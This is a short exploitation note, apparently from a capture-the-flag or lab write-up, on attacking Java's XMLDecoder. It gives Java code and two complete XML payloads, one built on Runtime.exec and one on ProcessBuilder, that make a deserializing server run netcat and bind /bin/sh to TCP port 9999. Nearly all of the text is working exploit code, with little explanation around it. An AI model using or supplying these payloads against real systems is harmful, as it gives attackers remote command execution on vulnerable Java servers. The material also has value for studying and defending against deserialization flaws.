XMLDecoder

if we read the signature generated by the server, it's easy to tell that the application is using XMLDecoder

<java version="1.7.0_67" class="java.beans.XMLDecoder">
...

we want to start a shell and bind it to a tcp port. the java code to do this looks like:

Runtime run = Runtime.getRuntime();
String[] commands = new String[] { "/usr/bin/nc", "-l","-p", "9999", "-e", "/bin/sh" };
run.exec(commands );

to get code execution, we will need to manually transform this code in the right format.
to do this, we get a runtime object using:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
	<void method="exec">
	<array class="java.lang.String" length="6">
		<void index="0">
			<string>/usr/bin/nc</string>
		</void>
		<void index="1">
			<string>-l</string>
		</void>
		<void index="2">
			<string>-p</string>
		</void>
		<void index="3">
			<string>9999</string>
		</void>
		<void index="4">
			<string>-e</string>
		</void>
		<void index="5">
			<string>/bin/sh</string>
		</void>
	</array>
	</void>
</object>
</java>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
  <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="6">
      <void index="0">
        <string>/usr/bin/nc</string>
      </void>
      <void index="1">
         <string>-l</string>
      </void>
      <void index="2">
         <string>-p</string>
      </void>
      <void index="3">
         <string>9999</string>
      </void>
      <void index="4">
         <string>-e</string>
      </void>
      <void index="5">
         <string>/bin/sh</string>
      </void>
    </array>
    <void method="start" id="process">
    </void>
  </void>
</java>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~